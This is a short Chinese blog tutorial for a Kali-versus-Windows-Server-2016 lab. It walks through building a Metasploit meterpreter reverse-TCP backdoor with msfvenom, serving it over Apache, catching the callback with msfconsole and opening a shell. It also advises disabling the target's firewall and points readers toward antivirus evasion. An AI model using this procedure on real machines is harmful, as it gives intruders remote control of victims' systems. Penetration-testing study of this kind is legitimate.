- A+
所属分类:Metasploit
文章目录
攻击机:kali
靶机:windows2016
一、生成后门
由于这个后门没有经过免杀,所以需要你们把windows2016防火墙关闭,你们·可以·自己去学习一下免杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.1(自己kali的IP) lport=50000 -f exe>test.exe
二、windows2016靶机下载后门
1、首先,我们需要开启apache2,然后将后门放入/var/www/html目录下
2、windows2016下载后门程序
在网页输入自己IP加后门名字浏览器打开就行
http://192.168.0.1/test.exe
三、设置监听
先在kali设置监听,然后运行后门程序
1、开启metasploit
先输入sudo msfconsole然后输入kali密码
2、设置监听模块
LHOST和LPORT填生成后门的IP地址和端口,然后在设置一下连接方式
四、上线windows2016靶机
1、先点击run,然后在运行windows2016靶机的后门程序
这就上线windows2016靶机成功了,然后使用shell命令进入windows2016控制台,由于两个系统有区别会出现乱码,我们使用chcp 65001解决。